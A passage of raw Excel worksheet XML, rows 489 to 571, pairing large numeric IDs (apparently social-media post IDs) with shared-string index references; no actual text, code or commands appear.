        <v>1.2356871528198001E+18</v>
      </c>
      <c r="B489" t="s">
        <v>1335</v>
      </c>
      <c r="C489" t="s">
        <v>1</v>
      </c>
      <c r="D489" t="s">
        <v>1336</v>
      </c>
      <c r="E489" t="s">
        <v>1337</v>
      </c>
      <c r="F489" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="490" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A490">
        <v>1.2356870718404301E+18</v>
      </c>
      <c r="B490" t="s">
        <v>1338</v>
      </c>
      <c r="C490" t="s">
        <v>1</v>
      </c>
      <c r="D490" t="s">
        <v>1339</v>
      </c>
      <c r="E490" t="s">
        <v>1340</v>
      </c>
      <c r="F490" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A491">
        <v>1.2356867868792399E+18</v>
      </c>
      <c r="B491" t="s">
        <v>1341</v>
      </c>
      <c r="C491" t="s">
        <v>1</v>
      </c>
      <c r="D491" t="s">
        <v>1342</v>
      </c>
      <c r="E491" t="s">
        <v>1343</v>
      </c>
      <c r="F491" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="492" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A492">
        <v>1.23568677702259E+18</v>
      </c>
      <c r="B492" t="s">
        <v>1344</v>
      </c>
      <c r="C492" t="s">
        <v>1</v>
      </c>
      <c r="D492" t="s">
        <v>1345</v>
      </c>
      <c r="E492" t="s">
        <v>1346</v>
      </c>
      <c r="F492" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A493">
        <v>1.2356866186079601E+18</v>
      </c>
      <c r="B493" t="s">
        <v>1347</v>
      </c>
      <c r="C493" t="s">
        <v>1</v>
      </c>
      <c r="D493" t="s">
        <v>1348</v>
      </c>
      <c r="E493" t="s">
        <v>1343</v>
      </c>
      <c r="F493" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A494">
        <v>1.23568653140018E+18</v>
      </c>
      <c r="B494" t="s">
        <v>1349</v>
      </c>
      <c r="C494" t="s">
        <v>1</v>
      </c>
      <c r="D494" t="s">
        <v>1350</v>
      </c>
      <c r="E494" t="s">
        <v>1351</v>
      </c>
      <c r="F494" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A495">
        <v>1.2356865251714501E+18</v>
      </c>
      <c r="B495" t="s">
        <v>1352</v>
      </c>
      <c r="C495" t="s">
        <v>1</v>
      </c>
      <c r="D495" t="s">
        <v>1353</v>
      </c>
      <c r="E495" t="s">
        <v>1354</v>
      </c>
      <c r="F495" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A496">
        <v>1.2356861507123899E+18</v>
      </c>
      <c r="B496" t="s">
        <v>1355</v>
      </c>
      <c r="C496" t="s">
        <v>1</v>
      </c>
      <c r="D496" t="s">
        <v>1356</v>
      </c>
      <c r="E496" t="s">
        <v>659</v>
      </c>
      <c r="F496" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A497">
        <v>1.2356859057063099E+18</v>
      </c>
      <c r="B497" t="s">
        <v>1357</v>
      </c>
      <c r="C497" t="s">
        <v>1</v>
      </c>
      <c r="D497" t="s">
        <v>1358</v>
      </c>
      <c r="E497" t="s">
        <v>1359</v>
      </c>
      <c r="F497" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A498">
        <v>1.2356854976887301E+18</v>
      </c>
      <c r="B498" t="s">
        <v>1360</v>
      </c>
      <c r="C498" t="s">
        <v>1</v>
      </c>
      <c r="D498" t="s">
        <v>1361</v>
      </c>
      <c r="E498" t="s">
        <v>1362</v>
      </c>
      <c r="F498" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A499">
        <v>1.23568531044226E+18</v>
      </c>
      <c r="B499" t="s">
        <v>1363</v>
      </c>
      <c r="C499" t="s">
        <v>1</v>
      </c>
      <c r="D499" t="s">
        <v>1364</v>
      </c>
      <c r="E499" t="s">
        <v>1351</v>
      </c>
      <c r="F499" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A500">
        <v>1.2356846458759099E+18</v>
      </c>
      <c r="B500" t="s">
        <v>1365</v>
      </c>
      <c r="C500" t="s">
        <v>1</v>
      </c>
      <c r="D500" t="s">
        <v>1366</v>
      </c>
      <c r="E500" t="s">
        <v>495</v>
      </c>
      <c r="F500" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A501">
        <v>1.23568453746161E+18</v>
      </c>
      <c r="B501" t="s">
        <v>1367</v>
      </c>
      <c r="C501" t="s">
        <v>1</v>
      </c>
      <c r="D501" t="s">
        <v>1368</v>
      </c>
      <c r="E501" t="s">
        <v>1369</v>
      </c>
    </row>
    <row r="502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A502">
        <v>1.2356844396336499E+18</v>
      </c>
      <c r="B502" t="s">
        <v>1370</v>
      </c>
      <c r="C502" t="s">
        <v>1</v>
      </c>
      <c r="D502" t="s">
        <v>1371</v>
      </c>
      <c r="E502" t="s">
        <v>1372</v>
      </c>
    </row>
    <row r="503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A503">
        <v>1.2356844268074801E+18</v>
      </c>
      <c r="B503" t="s">
        <v>1373</v>
      </c>
      <c r="C503" t="s">
        <v>1</v>
      </c>
      <c r="D503" t="s">
        <v>1374</v>
      </c>
      <c r="E503" t="s">
        <v>1375</v>
      </c>
    </row>
    <row r="504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A504">
        <v>1.2356842862351501E+18</v>
      </c>
      <c r="B504" t="s">
        <v>1376</v>
      </c>
      <c r="C504" t="s">
        <v>1</v>
      </c>
      <c r="D504" t="s">
        <v>1377</v>
      </c>
      <c r="E504" t="s">
        <v>1194</v>
      </c>
    </row>
    <row r="505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A505">
        <v>1.2356834084681999E+18</v>
      </c>
      <c r="B505" t="s">
        <v>1378</v>
      </c>
      <c r="C505" t="s">
        <v>1</v>
      </c>
      <c r="D505" t="s">
        <v>1379</v>
      </c>
      <c r="E505" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A506">
        <v>1.23568306865411E+18</v>
      </c>
      <c r="B506" t="s">
        <v>1380</v>
      </c>
      <c r="C506" t="s">
        <v>1</v>
      </c>
      <c r="D506" t="s">
        <v>1381</v>
      </c>
      <c r="E506" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A507">
        <v>1.2356827489096499E+18</v>
      </c>
      <c r="B507" t="s">
        <v>1382</v>
      </c>
      <c r="C507" t="s">
        <v>1</v>
      </c>
      <c r="D507" t="s">
        <v>1383</v>
      </c>
      <c r="E507" t="s">
        <v>1384</v>
      </c>
    </row>
    <row r="508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A508">
        <v>1.2356822592874299E+18</v>
      </c>
      <c r="B508" t="s">
        <v>1385</v>
      </c>
      <c r="C508" t="s">
        <v>1</v>
      </c>
      <c r="D508" t="s">
        <v>1386</v>
      </c>
      <c r="E508" t="s">
        <v>1387</v>
      </c>
    </row>
    <row r="509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A509">
        <v>1.2356821310843599E+18</v>
      </c>
      <c r="B509" t="s">
        <v>1388</v>
      </c>
      <c r="C509" t="s">
        <v>1</v>
      </c>
      <c r="D509" t="s">
        <v>1389</v>
      </c>
      <c r="E509" t="s">
        <v>1390</v>
      </c>
    </row>
    <row r="510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A510">
        <v>1.2356819899879501E+18</v>
      </c>
      <c r="B510" t="s">
        <v>1391</v>
      </c>
      <c r="C510" t="s">
        <v>1</v>
      </c>
      <c r="D510" t="s">
        <v>1392</v>
      </c>
      <c r="E510" t="s">
        <v>1393</v>
      </c>
    </row>
    <row r="511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A511">
        <v>1.23568192304688E+18</v>
      </c>
      <c r="B511" t="s">
        <v>1394</v>
      </c>
      <c r="C511" t="s">
        <v>1</v>
      </c>
      <c r="D511" t="s">
        <v>1395</v>
      </c>
      <c r="E511" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A512">
        <v>1.23568186981697E+18</v>
      </c>
      <c r="B512" t="s">
        <v>1397</v>
      </c>
      <c r="C512" t="s">
        <v>1</v>
      </c>
      <c r="D512" t="s">
        <v>1398</v>
      </c>
      <c r="E512" t="s">
        <v>1399</v>
      </c>
    </row>
    <row r="513" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A513">
        <v>1.2356818259153101E+18</v>
      </c>
      <c r="B513" t="s">
        <v>1400</v>
      </c>
      <c r="C513" t="s">
        <v>1</v>
      </c>
      <c r="D513" t="s">
        <v>1401</v>
      </c>
      <c r="E513" t="s">
        <v>1402</v>
      </c>
    </row>
    <row r="514" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A514">
        <v>1.2356816733013601E+18</v>
      </c>
      <c r="B514" t="s">
        <v>1403</v>
      </c>
      <c r="C514" t="s">
        <v>1</v>
      </c>
      <c r="D514" t="s">
        <v>1404</v>
      </c>
      <c r="E514" t="s">
        <v>1405</v>
      </c>
    </row>
    <row r="515" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A515">
        <v>1.23568116736769E+18</v>
      </c>
      <c r="B515" t="s">
        <v>1406</v>
      </c>
      <c r="C515" t="s">
        <v>1</v>
      </c>
      <c r="D515" t="s">
        <v>1407</v>
      </c>
      <c r="E515" t="s">
        <v>1408</v>
      </c>
    </row>
    <row r="516" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A516">
        <v>1.2356811656396401E+18</v>
      </c>
      <c r="B516" t="s">
        <v>1406</v>
      </c>
      <c r="C516" t="s">
        <v>1</v>
      </c>
      <c r="D516" t="s">
        <v>1409</v>
      </c>
      <c r="E516" t="s">
        <v>1408</v>
      </c>
    </row>
    <row r="517" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A517">
        <v>1.2356811425372001E+18</v>
      </c>
      <c r="B517" t="s">
        <v>1410</v>
      </c>
      <c r="C517" t="s">
        <v>1</v>
      </c>
      <c r="D517" t="s">
        <v>1411</v>
      </c>
      <c r="E517" t="s">
        <v>1412</v>
      </c>
    </row>
    <row r="518" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A518">
        <v>1.2356804681310899E+18</v>
      </c>
      <c r="B518" t="s">
        <v>1413</v>
      </c>
      <c r="C518" t="s">
        <v>1</v>
      </c>
      <c r="D518" t="s">
        <v>1414</v>
      </c>
      <c r="E518" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="519" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A519">
        <v>1.23568030579872E+18</v>
      </c>
      <c r="B519" t="s">
        <v>1415</v>
      </c>
      <c r="C519" t="s">
        <v>1</v>
      </c>
      <c r="D519" t="s">
        <v>1416</v>
      </c>
      <c r="E519" t="s">
        <v>1417</v>
      </c>
    </row>
    <row r="520" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A520">
        <v>1.2356794088595999E+18</v>
      </c>
      <c r="B520" t="s">
        <v>1418</v>
      </c>
      <c r="C520" t="s">
        <v>1</v>
      </c>
      <c r="D520" t="s">
        <v>1419</v>
      </c>
      <c r="E520" t="s">
        <v>1420</v>
      </c>
    </row>
    <row r="521" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A521">
        <v>1.23567905456256E+18</v>
      </c>
      <c r="B521" t="s">
        <v>1421</v>
      </c>
      <c r="C521" t="s">
        <v>1</v>
      </c>
      <c r="D521" t="s">
        <v>1422</v>
      </c>
      <c r="E521" t="s">
        <v>1423</v>
      </c>
    </row>
    <row r="522" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A522">
        <v>1.2356789766156001E+18</v>
      </c>
      <c r="B522" t="s">
        <v>1424</v>
      </c>
      <c r="C522" t="s">
        <v>1</v>
      </c>
      <c r="D522" t="s">
        <v>1425</v>
      </c>
      <c r="E522" t="s">
        <v>514</v>
      </c>
    </row>
    <row r="523" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A523">
        <v>1.2356786014349E+18</v>
      </c>
      <c r="B523" t="s">
        <v>1426</v>
      </c>
      <c r="C523" t="s">
        <v>1</v>
      </c>
      <c r="D523" t="s">
        <v>1427</v>
      </c>
      <c r="E523" t="s">
        <v>1428</v>
      </c>
    </row>
    <row r="524" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A524">
        <v>1.2356784547559301E+18</v>
      </c>
      <c r="B524" t="s">
        <v>1429</v>
      </c>
      <c r="C524" t="s">
        <v>1</v>
      </c>
      <c r="D524" t="s">
        <v>1430</v>
      </c>
      <c r="E524" t="s">
        <v>1431</v>
      </c>
    </row>
    <row r="525" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A525">
        <v>1.2356784378654799E+18</v>
      </c>
      <c r="B525" t="s">
        <v>1432</v>
      </c>
      <c r="C525" t="s">
        <v>1</v>
      </c>
      <c r="D525" t="s">
        <v>1433</v>
      </c>
      <c r="E525" t="s">
        <v>1434</v>
      </c>
    </row>
    <row r="526" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A526">
        <v>1.2356772930471401E+18</v>
      </c>
      <c r="B526" t="s">
        <v>1435</v>
      </c>
      <c r="C526" t="s">
        <v>1</v>
      </c>
      <c r="D526" t="s">
        <v>1436</v>
      </c>
      <c r="E526" t="s">
        <v>1437</v>
      </c>
    </row>
    <row r="527" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A527">
        <v>1.2356770794102799E+18</v>
      </c>
      <c r="B527" t="s">
        <v>1438</v>
      </c>
      <c r="C527" t="s">
        <v>1</v>
      </c>
      <c r="D527" t="s">
        <v>1439</v>
      </c>
      <c r="E527" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="528" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A528">
        <v>1.23567663250718E+18</v>
      </c>
      <c r="B528" t="s">
        <v>1440</v>
      </c>
      <c r="C528" t="s">
        <v>1</v>
      </c>
      <c r="D528" t="s">
        <v>1441</v>
      </c>
      <c r="E528" t="s">
        <v>1442</v>
      </c>
    </row>
    <row r="529" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A529">
        <v>1.23567661934545E+18</v>
      </c>
      <c r="B529" t="s">
        <v>1443</v>
      </c>
      <c r="C529" t="s">
        <v>1</v>
      </c>
      <c r="D529" t="s">
        <v>1444</v>
      </c>
      <c r="E529" t="s">
        <v>1445</v>
      </c>
    </row>
    <row r="530" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A530">
        <v>1.2356765624790799E+18</v>
      </c>
      <c r="B530" t="s">
        <v>1446</v>
      </c>
      <c r="C530" t="s">
        <v>1</v>
      </c>
      <c r="D530" t="s">
        <v>1447</v>
      </c>
      <c r="E530" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="531" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A531">
        <v>1.23567579936736E+18</v>
      </c>
      <c r="B531" t="s">
        <v>1448</v>
      </c>
      <c r="C531" t="s">
        <v>1</v>
      </c>
      <c r="D531" t="s">
        <v>1449</v>
      </c>
      <c r="E531" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="532" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A532">
        <v>1.23567550615201E+18</v>
      </c>
      <c r="B532" t="s">
        <v>1450</v>
      </c>
      <c r="C532" t="s">
        <v>1</v>
      </c>
      <c r="D532" t="s">
        <v>1451</v>
      </c>
      <c r="E532" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="533" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A533">
        <v>1.23567535946881E+18</v>
      </c>
      <c r="B533" t="s">
        <v>1452</v>
      </c>
      <c r="C533" t="s">
        <v>1</v>
      </c>
      <c r="D533" t="s">
        <v>1453</v>
      </c>
      <c r="E533" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="534" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A534">
        <v>1.23567526828464E+18</v>
      </c>
      <c r="B534" t="s">
        <v>1454</v>
      </c>
      <c r="C534" t="s">
        <v>1</v>
      </c>
      <c r="D534" t="s">
        <v>1455</v>
      </c>
      <c r="E534" t="s">
        <v>1456</v>
      </c>
    </row>
    <row r="535" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A535">
        <v>1.2356749058923799E+18</v>
      </c>
      <c r="B535" t="s">
        <v>1457</v>
      </c>
      <c r="C535" t="s">
        <v>1</v>
      </c>
      <c r="D535" t="s">
        <v>1458</v>
      </c>
      <c r="E535" t="s">
        <v>1459</v>
      </c>
    </row>
    <row r="536" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A536">
        <v>1.23567429796157E+18</v>
      </c>
      <c r="B536" t="s">
        <v>1460</v>
      </c>
      <c r="C536" t="s">
        <v>1</v>
      </c>
      <c r="D536" t="s">
        <v>1461</v>
      </c>
      <c r="E536" t="s">
        <v>1462</v>
      </c>
    </row>
    <row r="537" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A537">
        <v>1.2356741986532301E+18</v>
      </c>
      <c r="B537" t="s">
        <v>1463</v>
      </c>
      <c r="C537" t="s">
        <v>1</v>
      </c>
      <c r="D537" t="s">
        <v>1464</v>
      </c>
      <c r="E537" t="s">
        <v>1465</v>
      </c>
    </row>
    <row r="538" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A538">
        <v>1.23567417078608E+18</v>
      </c>
      <c r="B538" t="s">
        <v>1466</v>
      </c>
      <c r="C538" t="s">
        <v>1</v>
      </c>
      <c r="D538" t="s">
        <v>1467</v>
      </c>
      <c r="E538" t="s">
        <v>1468</v>
      </c>
    </row>
    <row r="539" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A539">
        <v>1.23567389993071E+18</v>
      </c>
      <c r="B539" t="s">
        <v>1469</v>
      </c>
      <c r="C539" t="s">
        <v>1</v>
      </c>
      <c r="D539" t="s">
        <v>1470</v>
      </c>
      <c r="E539" t="s">
        <v>1471</v>
      </c>
    </row>
    <row r="540" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A540">
        <v>1.23567376474829E+18</v>
      </c>
      <c r="B540" t="s">
        <v>1472</v>
      </c>
      <c r="C540" t="s">
        <v>1</v>
      </c>
      <c r="D540" t="s">
        <v>1473</v>
      </c>
      <c r="E540" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="541" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A541">
        <v>1.2356736060314701E+18</v>
      </c>
      <c r="B541" t="s">
        <v>1475</v>
      </c>
      <c r="C541" t="s">
        <v>1</v>
      </c>
      <c r="D541" t="s">
        <v>1476</v>
      </c>
      <c r="E541" t="s">
        <v>1477</v>
      </c>
    </row>
    <row r="542" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A542">
        <v>1.2356734831802701E+18</v>
      </c>
      <c r="B542" t="s">
        <v>1478</v>
      </c>
      <c r="C542" t="s">
        <v>1</v>
      </c>
      <c r="D542" t="s">
        <v>1479</v>
      </c>
      <c r="E542" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="543" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A543">
        <v>1.23567291879902E+18</v>
      </c>
      <c r="B543" t="s">
        <v>1480</v>
      </c>
      <c r="C543" t="s">
        <v>1</v>
      </c>
      <c r="D543" t="s">
        <v>1481</v>
      </c>
      <c r="E543" t="s">
        <v>1482</v>
      </c>
    </row>
    <row r="544" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A544">
        <v>1.2356727897990999E+18</v>
      </c>
      <c r="B544" t="s">
        <v>1483</v>
      </c>
      <c r="C544" t="s">
        <v>1</v>
      </c>
      <c r="D544" t="s">
        <v>1484</v>
      </c>
      <c r="E544" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="545" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A545">
        <v>1.23567273462722E+18</v>
      </c>
      <c r="B545" t="s">
        <v>1486</v>
      </c>
      <c r="C545" t="s">
        <v>1</v>
      </c>
      <c r="D545" t="s">
        <v>1487</v>
      </c>
      <c r="E545" t="s">
        <v>1488</v>
      </c>
    </row>
    <row r="546" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A546">
        <v>1.2356718602700301E+18</v>
      </c>
      <c r="B546" t="s">
        <v>1489</v>
      </c>
      <c r="C546" t="s">
        <v>1</v>
      </c>
      <c r="D546" t="s">
        <v>1490</v>
      </c>
      <c r="E546" t="s">
        <v>1491</v>
      </c>
    </row>
    <row r="547" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A547">
        <v>1.2356717791184599E+18</v>
      </c>
      <c r="B547" t="s">
        <v>1492</v>
      </c>
      <c r="C547" t="s">
        <v>1</v>
      </c>
      <c r="D547" t="s">
        <v>1493</v>
      </c>
      <c r="E547" t="s">
        <v>1494</v>
      </c>
    </row>
    <row r="548" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A548">
        <v>1.2356717513104E+18</v>
      </c>
      <c r="B548" t="s">
        <v>1495</v>
      </c>
      <c r="C548" t="s">
        <v>1</v>
      </c>
      <c r="D548" t="s">
        <v>1496</v>
      </c>
      <c r="E548" t="s">
        <v>1497</v>
      </c>
    </row>
    <row r="549" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A549">
        <v>1.2356717478585001E+18</v>
      </c>
      <c r="B549" t="s">
        <v>1495</v>
      </c>
      <c r="C549" t="s">
        <v>1</v>
      </c>
      <c r="D549" t="s">
        <v>1498</v>
      </c>
      <c r="E549" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="550" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A550">
        <v>1.23567147688128E+18</v>
      </c>
      <c r="B550" t="s">
        <v>1499</v>
      </c>
      <c r="C550" t="s">
        <v>1</v>
      </c>
      <c r="D550" t="s">
        <v>1500</v>
      </c>
      <c r="E550" t="s">
        <v>1501</v>
      </c>
    </row>
    <row r="551" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A551">
        <v>1.23567125098029E+18</v>
      </c>
      <c r="B551" t="s">
        <v>1502</v>
      </c>
      <c r="C551" t="s">
        <v>1</v>
      </c>
      <c r="D551" t="s">
        <v>1503</v>
      </c>
      <c r="E551" t="s">
        <v>1504</v>
      </c>
    </row>
    <row r="552" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A552">
        <v>1.2356705958929201E+18</v>
      </c>
      <c r="B552" t="s">
        <v>1505</v>
      </c>
      <c r="C552" t="s">
        <v>1</v>
      </c>
      <c r="D552" t="s">
        <v>1506</v>
      </c>
      <c r="E552" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="553" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A553">
        <v>1.2356701692776699E+18</v>
      </c>
      <c r="B553" t="s">
        <v>1507</v>
      </c>
      <c r="C553" t="s">
        <v>1</v>
      </c>
      <c r="D553" t="s">
        <v>1508</v>
      </c>
      <c r="E553" t="s">
        <v>1509</v>
      </c>
    </row>
    <row r="554" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A554">
        <v>1.23567011146317E+18</v>
      </c>
      <c r="B554" t="s">
        <v>1510</v>
      </c>
      <c r="C554" t="s">
        <v>1</v>
      </c>
      <c r="D554" t="s">
        <v>1511</v>
      </c>
      <c r="E554" t="s">
        <v>1512</v>
      </c>
    </row>
    <row r="555" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A555">
        <v>1.23567009144815E+18</v>
      </c>
      <c r="B555" t="s">
        <v>1513</v>
      </c>
      <c r="C555" t="s">
        <v>1</v>
      </c>
      <c r="D555" t="s">
        <v>1514</v>
      </c>
      <c r="E555" t="s">
        <v>1515</v>
      </c>
    </row>
    <row r="556" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A556">
        <v>1.2356694195458401E+18</v>
      </c>
      <c r="B556" t="s">
        <v>1516</v>
      </c>
      <c r="C556" t="s">
        <v>1</v>
      </c>
      <c r="D556" t="s">
        <v>1517</v>
      </c>
      <c r="E556" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="557" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A557">
        <v>1.23566917418306E+18</v>
      </c>
      <c r="B557" t="s">
        <v>1519</v>
      </c>
      <c r="C557" t="s">
        <v>1</v>
      </c>
      <c r="D557" t="s">
        <v>1520</v>
      </c>
      <c r="E557" t="s">
        <v>1521</v>
      </c>
    </row>
    <row r="558" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A558">
        <v>1.2356690371175601E+18</v>
      </c>
      <c r="B558" t="s">
        <v>1522</v>
      </c>
      <c r="C558" t="s">
        <v>1</v>
      </c>
      <c r="D558" t="s">
        <v>1523</v>
      </c>
      <c r="E558" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="559" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A559">
        <v>1.2356687959954099E+18</v>
      </c>
      <c r="B559" t="s">
        <v>1524</v>
      </c>
      <c r="C559" t="s">
        <v>1</v>
      </c>
      <c r="D559" t="s">
        <v>1525</v>
      </c>
      <c r="E559" t="s">
        <v>1526</v>
      </c>
    </row>
    <row r="560" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A560">
        <v>1.2356682567462799E+18</v>
      </c>
      <c r="B560" t="s">
        <v>1527</v>
      </c>
      <c r="C560" t="s">
        <v>1</v>
      </c>
      <c r="D560" t="s">
        <v>1528</v>
      </c>
      <c r="E560" t="s">
        <v>1529</v>
      </c>
    </row>
    <row r="561" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A561">
        <v>1.2356677135252401E+18</v>
      </c>
      <c r="B561" t="s">
        <v>1530</v>
      </c>
      <c r="C561" t="s">
        <v>1</v>
      </c>
      <c r="D561" t="s">
        <v>1531</v>
      </c>
      <c r="E561" t="s">
        <v>1532</v>
      </c>
    </row>
    <row r="562" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A562">
        <v>1.2356676805326799E+18</v>
      </c>
      <c r="B562" t="s">
        <v>1533</v>
      </c>
      <c r="C562" t="s">
        <v>1</v>
      </c>
      <c r="D562" t="s">
        <v>1534</v>
      </c>
      <c r="E562" t="s">
        <v>1535</v>
      </c>
    </row>
    <row r="563" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A563">
        <v>1.23566743667182E+18</v>
      </c>
      <c r="B563" t="s">
        <v>1536</v>
      </c>
      <c r="C563" t="s">
        <v>1</v>
      </c>
      <c r="D563" t="s">
        <v>1537</v>
      </c>
      <c r="E563" t="s">
        <v>1538</v>
      </c>
    </row>
    <row r="564" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A564">
        <v>1.23566727685603E+18</v>
      </c>
      <c r="B564" t="s">
        <v>1539</v>
      </c>
      <c r="C564" t="s">
        <v>1</v>
      </c>
      <c r="D564" t="s">
        <v>1540</v>
      </c>
      <c r="E564" t="s">
        <v>1541</v>
      </c>
    </row>
    <row r="565" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A565">
        <v>1.23566693663507E+18</v>
      </c>
      <c r="B565" t="s">
        <v>1542</v>
      </c>
      <c r="C565" t="s">
        <v>1</v>
      </c>
      <c r="D565" t="s">
        <v>1543</v>
      </c>
      <c r="E565" t="s">
        <v>1544</v>
      </c>
    </row>
    <row r="566" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A566">
        <v>1.23566663588671E+18</v>
      </c>
      <c r="B566" t="s">
        <v>1545</v>
      </c>
      <c r="C566" t="s">
        <v>1</v>
      </c>
      <c r="D566" t="s">
        <v>1546</v>
      </c>
      <c r="E566" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="567" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A567">
        <v>1.2356664918838899E+18</v>
      </c>
      <c r="B567" t="s">
        <v>1548</v>
      </c>
      <c r="C567" t="s">
        <v>1</v>
      </c>
      <c r="D567" t="s">
        <v>1549</v>
      </c>
      <c r="E567" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="568" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A568">
        <v>1.23566603027136E+18</v>
      </c>
      <c r="B568" t="s">
        <v>1551</v>
      </c>
      <c r="C568" t="s">
        <v>1</v>
      </c>
      <c r="D568" t="s">
        <v>1552</v>
      </c>
      <c r="E568" t="s">
        <v>1553</v>
      </c>
    </row>
    <row r="569" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A569">
        <v>1.2356657930163599E+18</v>
      </c>
      <c r="B569" t="s">
        <v>1554</v>
      </c>
      <c r="C569" t="s">
        <v>1</v>
      </c>
      <c r="D569" t="s">
        <v>1555</v>
      </c>
      <c r="E569" t="s">
        <v>1556</v>
      </c>
    </row>
    <row r="570" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A570">
        <v>1.2356656042013701E+18</v>
      </c>
      <c r="B570" t="s">
        <v>1557</v>
      </c>
      <c r="C570" t="s">
        <v>1</v>
      </c>
      <c r="D570" t="s">
        <v>1558</v>
      </c>
      <c r="E570" t="s">
        <v>1559</v>
      </c>
    </row>
    <row r="571" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A571">
        <v>1.2356651893217001E+18</v>
      </c>
